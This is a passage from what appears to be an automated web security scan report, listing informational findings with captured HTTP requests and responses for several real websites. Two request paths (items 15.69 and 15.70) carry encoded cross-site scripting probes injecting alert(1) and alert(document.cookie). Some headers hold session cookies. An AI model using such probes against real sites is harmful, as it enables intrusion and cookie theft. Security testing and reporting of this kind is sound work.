<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Page Not Found</TITLE>
<style type="text/css">
<!--
h1 {
   font-family:Verdana, Arial, Helvetica, sans-serif;
   font-size: 24p
...[SNIP]...

15.68. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24/page-1/include/img/spacer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sti-cs.com
Path:   /Portfolio/Trades-and-Exhibits/id-24/page-1/include/img/spacer.gif

Request

GET /Portfolio/Trades-and-Exhibits/id-24/page-1/include/img/spacer.gif HTTP/1.1
Host: www.sti-cs.com
Proxy-Connection: keep-alive
Referer: http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24/page-1/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249072581.1298762443.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=249072581.1903656466.1298752883.1298757236.1298762443.3; __utmc=249072581; __utmb=249072581.1.10.1298762443

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 23:20:42 GMT
Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635
Last-Modified: Thu, 26 Jul 2007 15:14:04 GMT
ETag: "19b842-2b5-4362c13c0adc6"
Accept-Ranges: bytes
Content-Length: 693
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Page Not Found</TITLE>
<style type="text/css">
<!--
h1 {
   font-family:Verdana, Arial, Helvetica, sans-serif;
   font-size: 24p
...[SNIP]...

15.69. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24c8e9b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1374672bac/page-1/include/img/spacer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sti-cs.com
Path:   /Portfolio/Trades-and-Exhibits/id-24c8e9b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1374672bac/page-1/include/img/spacer.gif

Request

GET /Portfolio/Trades-and-Exhibits/id-24c8e9b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1374672bac/page-1/include/img/spacer.gif HTTP/1.1
Host: www.sti-cs.com
Proxy-Connection: keep-alive
Referer: http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24c8e9b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1374672bac/page-1/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249072581.1298845979.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; __utma=249072581.1903656466.1298752883.1298762443.1298845979.4

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 15:44:35 GMT
Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635
Last-Modified: Thu, 26 Jul 2007 15:14:04 GMT
ETag: "19b842-2b5-4362c13c0adc6"
Accept-Ranges: bytes
Content-Length: 693
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Page Not Found</TITLE>
<style type="text/css">
<!--
h1 {
   font-family:Verdana, Arial, Helvetica, sans-serif;
   font-size: 24p
...[SNIP]...

15.70. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24c8e9b%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ea1374672bac/page-1/include/img/spacer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sti-cs.com
Path:   /Portfolio/Trades-and-Exhibits/id-24c8e9b%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ea1374672bac/page-1/include/img/spacer.gif

Request

GET /Portfolio/Trades-and-Exhibits/id-24c8e9b%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ea1374672bac/page-1/include/img/spacer.gif HTTP/1.1
Host: www.sti-cs.com
Proxy-Connection: keep-alive
Referer: http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24c8e9b%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ea1374672bac/page-1/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249072581.1298907905.5.4.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/32; __utma=249072581.1903656466.1298752883.1298845979.1298907905.5; __utmc=249072581; __utmb=249072581.2.10.1298907905

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 15:46:10 GMT
Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635
Last-Modified: Thu, 26 Jul 2007 15:14:04 GMT
ETag: "19b842-2b5-4362c13c0adc6"
Accept-Ranges: bytes
Content-Length: 693
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Page Not Found</TITLE>
<style type="text/css">
<!--
h1 {
   font-family:Verdana, Arial, Helvetica, sans-serif;
   font-size: 24p
...[SNIP]...

15.71. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/include/img/spacer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sti-cs.com
Path:   /Portfolio/Trades-and-Exhibits/include/img/spacer.gif

Request

GET /Portfolio/Trades-and-Exhibits/include/img/spacer.gif HTTP/1.1
Host: www.sti-cs.com
Proxy-Connection: keep-alive
Referer: http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298752883.1; __utmc=249072581; __utmb=249072581.4.10.1298752883

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 20:44:01 GMT
Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635
Last-Modified: Thu, 26 Jul 2007 15:14:04 GMT
ETag: "19b842-2b5-4362c13c0adc6"
Accept-Ranges: bytes
Content-Length: 693
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Page Not Found</TITLE>
<style type="text/css">
<!--
h1 {
   font-family:Verdana, Arial, Helvetica, sans-serif;
   font-size: 24p
...[SNIP]...

15.72. http://www.sti-cs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sti-cs.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.sti-cs.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298752883.1; __utmc=249072581; __utmb=249072581.3.10.1298752883

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 20:41:34 GMT
Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635
Last-Modified: Thu, 26 Jul 2007 15:14:04 GMT
ETag: "19b842-2b5-4362c13c0adc6"
Accept-Ranges: bytes
Content-Length: 693
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Page Not Found</TITLE>
<style type="text/css">
<!--
h1 {
   font-family:Verdana, Arial, Helvetica, sans-serif;
   font-size: 24p
...[SNIP]...

15.73. http://www.sti-cs.com/links/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sti-cs.com
Path:   /links/

Request

GET /links/ HTTP/1.1
Host: www.sti-cs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:18:52 GMT
Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 19784

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
   <HEAD>
       <title>STI Creative Services | Request for Quote</title>
<meta name="Description
...[SNIP]...

15.74. http://www.sti-cs.com/rfq/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sti-cs.com
Path:   /rfq/

Request

GET /rfq/ HTTP/1.1
Host: www.sti-cs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:18:44 GMT
Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 19493

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
   <HEAD>
       <title>STI Creative Services | Request for Quote</title>
<meta name="Description
...[SNIP]...

15.75. http://www.thedetroitbureau.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thedetroitbureau.com
Path:   /

Request

GET / HTTP/1.1
Host: www.thedetroitbureau.com
Proxy-Connection: keep-alive
Referer: http://www.thedetroitbureau.com/about-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=255133005.1298752860.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bb2_screener_=1298752842+173.193.214.243; __utma_a2a=5531533397.1330309787.1298752861.1298752877.1298752928.5; __utma=255133005.1929730161.1298752860.1298752860.1298752860.1; __utmc=255133005; __utmb=255133005.5.10.1298752860

Response

HTTP/1.1 400 Bad Behavior
Date: Sat, 26 Feb 2011 20:41:47 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7m
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--< html xmlns="http://www.w3.org/1999/xhtml">-->
<head>
<title>HTTP Error 4
...[SNIP]...

15.76. http://www.thedetroitbureau.com/2011/02/insurer-wants-fbi-to-pay-750000-for-crashed-ferrari/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thedetroitbureau.com
Path:   /2011/02/insurer-wants-fbi-to-pay-750000-for-crashed-ferrari/

Request

GET /2011/02/insurer-wants-fbi-to-pay-750000-for-crashed-ferrari/ HTTP/1.1
Host: www.thedetroitbureau.com
Proxy-Connection: keep-alive
Referer: http://www.thedetroitbureau.com/about-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=255133005.1298752860.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bb2_screener_=1298752842+173.193.214.243; __utma_a2a=5531533397.1330309787.1298752861.1298752877.1298752928.5; __utma=255133005.1929730161.1298752860.1298752860.1298752860.1; __utmc=255133005; __utmb=255133005.5.10.1298752860

Response

HTTP/1.1 400 Bad Behavior
Date: Sat, 26 Feb 2011 20:41:47 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7m
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--< html xmlns="http://www.w3.org/1999/xhtml">-->
<head>
<title>HTTP Error 4
...[SNIP]...

15.77. http://www.thedetroitbureau.com/contact-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thedetroitbureau.com
Path:   /contact-us/

Request

GET /contact-us/ HTTP/1.1
Host: www.thedetroitbureau.com
Proxy-Connection: keep-alive
Referer: http://www.thedetroitbureau.com/about-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=255133005.1298752860.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bb2_screener_=1298752842+173.193.214.243; __utma_a2a=5531533397.1330309787.1298752861.1298752944.1298752952.7; __utma=255133005.1929730161.1298752860.1298752860.1298752860.1; __utmc=255133005; __utmb=255133005.7.10.1298752860

Response

HTTP/1.1 400 Bad Behavior
Date: Sat, 26 Feb 2011 20:42:01 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7m
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--< html xmlns="http://www.w3.org/1999/xhtml">-->
<head>
<title>HTTP Error 4
...[SNIP]...

15.78. http://www.virtusa.com/alumni/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /alumni/

Request

GET /alumni/ HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 405
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:02:49 GMT
Connection: close


<HTML>
<HEAD>
   <TITLE>404 - Page Not Found</TITLE>
   <META NAME="ROBOTS" CONTENT="NOINDEX, FOLLOW">
<meta http-equiv="refresh" content="5;url=/">
</HEAD>
<BODY>
<p><b>Not Found</b></p>
<p
...[SNIP]...

15.79. http://www.virtusa.com/careers/our-values.asp/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /careers/our-values.asp/

Request

GET /careers/our-values.asp/ HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 421
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:35:03 GMT
Connection: close


<HTML>
<HEAD>
   <TITLE>404 - Page Not Found</TITLE>
   <META NAME="ROBOTS" CONTENT="NOINDEX, FOLLOW">
<meta http-equiv="refresh" content="5;url=/">
</HEAD>
<BODY>
<p><b>Not Found</b></p>
<p
...[SNIP]...

15.80. http://www.virtusa.com/careers/work-environment.asp/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /careers/work-environment.asp/

Request

GET /careers/work-environment.asp/ HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 427
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:34:58 GMT
Connection: close


<HTML>
<HEAD>
   <TITLE>404 - Page Not Found</TITLE>
   <META NAME="ROBOTS" CONTENT="NOINDEX, FOLLOW">
<meta http-equiv="refresh" content="5;url=/">
</HEAD>
<BODY>
<p><b>Not Found</b></p>
<p
...[SNIP]...

15.81. http://www.virtusa.com/common/exitpage.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /common/exitpage.asp

Request

GET /common/exitpage.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 1969
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:59:33 GMT
Connection: close


<style>
body{
   padding:0;
   margin:0;
   font-family: Arial, Helvetica, sans-serif;
   font-size: 12px;
   color: #333;
}
   
#contentarea{
   display:block;
   padding-top:10px;
}

#tbl{
   display
...[SNIP]...

15.82. http://www.virtusa.com/contactus/sendmail.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /contactus/sendmail.asp

Request

GET /contactus/sendmail.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 131
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:39:39 GMT
Connection: close


       <script language="Javascript">
           alert("Invalid captcha input. Please enter again.");        
           history.back(0);
       </script>
       

15.83. http://www.virtusa.com/ftbu/images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/images/favicon.ico

Request

GET /ftbu/images/favicon.ico HTTP/1.1
Host: www.virtusa.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utmb=213023891

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 421
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:31:34 GMT


<HTML>
<HEAD>
   <TITLE>404 - Page Not Found</TITLE>
   <META NAME="ROBOTS" CONTENT="NOINDEX, FOLLOW">
<meta http-equiv="refresh" content="5;url=/">
</HEAD>
<BODY>
<p><b>Not Found</b></p>
<p
...[SNIP]...

15.84. http://www.virtusa.com/ftbu/scripts/topnav/style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/scripts/topnav/style.css

Request

GET /ftbu/scripts/topnav/style.css HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 427
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:46:48 GMT
Connection: close


<HTML>
<HEAD>
   <TITLE>404 - Page Not Found</TITLE>
   <META NAME="ROBOTS" CONTENT="NOINDEX, FOLLOW">
<meta http-equiv="refresh" content="5;url=/">
</HEAD>
<BODY>
<p><b>Not Found</b></p>
<p
...[SNIP]...

15.85. http://www.virtusa.com/practices/software-testing/tools-expertise.asp/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /practices/software-testing/tools-expertise.asp/

Request

GET /practices/software-testing/tools-expertise.asp/ HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 445
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:43:48 GMT
Connection: close


<HTML>
<HEAD>
   <TITLE>404 - Page Not Found</TITLE>
   <META NAME="ROBOTS" CONTENT="NOINDEX, FOLLOW">
<meta http-equiv="refresh" content="5;url=/">
</HEAD>
<BODY>
<p><b>Not Found</b></p>
<p
...[SNIP]...

15.86. http://www.virtusa.com/sustainability/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /sustainability/

Request

GET /sustainability/ HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 413
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:02:34 GMT
Connection: close


<HTML>
<HEAD>
   <TITLE>404 - Page Not Found</TITLE>
   <META NAME="ROBOTS" CONTENT="NOINDEX, FOLLOW">
<meta http-equiv="refresh" content="5;url=/">
</HEAD>
<BODY>
<p><b>Not Found</b></p>
<p
...[SNIP]...

15.87. http://www.wolframalpha.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wolframalpha.com
Path:   /

Request

GET / HTTP/1.1
Host: www.wolframalpha.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WR_SID=173.193.214.243.1298948109851419; JSESSIONID=7DAD5D390C369AAD1DB59117DBCB8DA6; __utmz=171643174.1298948189.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=171643174.1847852404.1298944705.1298944705.1298948189.2; __utmc=171643174; __utmb=171643174.1.10.1298948189; __unam=55c5e66-12e6f587d90-19185b37-1

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 03:06:49 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 11486

<!DOCTYPE html>
<html class="no-js">
<head>
<title>Wolfram|Alpha: Computational Knowledge Engine</title>
<meta charset="utf-8" />
<meta name="description" content="Wolfram|Alpha is more th
...[SNIP]...

15.88. http://xss.cx//examples/plesk-reports/plesk-xss.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xss.cx
Path:   //examples/plesk-reports/plesk-xss.html

Request

GET //examples/plesk-reports/plesk-xss.html HTTP/1.1
Host: xss.cx
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: whoson=818-1298821388382

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=604800
Content-Type: text/html
Last-Modified: Mon, 28 Feb 2011 22:19:30 GMT
Accept-Ranges: bytes
ETag: "056b9195d7cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-DORK-Server: xss.cx
Date: Mon, 28 Feb 2011 22:20:20 GMT
Content-Length: 31071

